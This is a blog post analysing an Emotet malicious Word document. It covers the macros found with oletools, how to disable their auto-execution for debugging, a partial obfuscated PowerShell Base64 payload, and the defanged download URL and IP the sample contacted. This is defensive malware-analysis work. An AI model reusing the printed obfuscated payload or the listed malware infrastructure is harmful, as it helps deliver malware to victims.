Emotet malware analysis


VirusTotal sample – c9bdfb2d6ac9e493bc391b2f64b48d8d5cde10645ea921951b23112e6d73545c

File Type: Microsoft Word Document

Document Property:

I have used Oletools to analyse word document properties and analyse content.

wm2.PNG

wm3.PNG

This word document has VBA macros.

After parsing word document using olevba, this tells, file has suspicious hex string and Base64 strings.

And file has below macros,

  • LUDoB_BX.cls
  • fkkkCAk.bas
  • ZAAcAA.bas

And macros will auto execute on opening document

wm4.PNG

I start debugging macros in word document,

wm5.PNG

After Enable Editing, Open View Macros under View tab

wm6

wm7

Click on Edit and change autoopen() function to autoopen2().

wm8

There are many small chunks of Base64 strings which  are concatenating and creating a PowerShell script I have captured the Base64 string in text file and tried to decode. I didn’t get the complete base64 but some part of it and can be recognized it is PowerShell script.

wm14.PNG

(nEw-OBJECt sySTeM.Io.comPReSsIOn.dEfLatEstReAM( [Io.mEMORystREam] [coNverT]::FrOMbase64stRING((‘ZZJh’+’i’+’5’+’tAEIb/y’+’n’+’4’+’QNiFVz9YP5US4MbYSS’+’gOmhLN’+’H’+’QXQz’+’6kbd9XSjOUL’+’+e’+’zdtJbSdb7s87z’+’vDO2’+’O8g’+’q5’+’z4P’+’r0E’+’EA’+’an8’+’OI’+’esbXKA5TGfoCJ1PmR2SK’+’bFFZz5ivG45’+’CecZrKJMA’+’wKeV’+’Ut2jbW’+’M’+’7
IArsj9xisrWnzmRSKI3’+’a’+’u’+’9’+’2Xk/10wwbNVRmTQ6npG’+’csO’+’LRe24’+’zjuHZq’+’m’+’yaoy’+’c’+’chPvF’+’F’+’Z1w3/e’+’k4’+’f’+’FLs9Cl’+’7aT’+’v5’+’b+EfXv2Wi63FQv’+’zSs5Gau/Y/’+’tJ’+’7m9N’+’xiwH3nBR/’+’zPeDdubW’+’p96xquFvSJLj1j1Pk44’+’L74N’+’N’+’iDT

during debugging, I got the below values are stored in the variable YAAAAAA and it is reading registry key values.

wm9

wm10

wm13.PNG

while debugging, I captured traffic using WireShark and found, connection has been made to web site emseenerji[.]com at IP 94[.]73[.]147[.]237. URL is still alive and can be accessed.

wm11.PNG

wm12.PNG

The complete URL which was accessed by this program http:// emseenerji[.]com/wp-content/RRKu/

My host machine AV blocked this URL and I couldn’t analyze traffic further from this URL to my VM.

Thank you.

4 comments

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.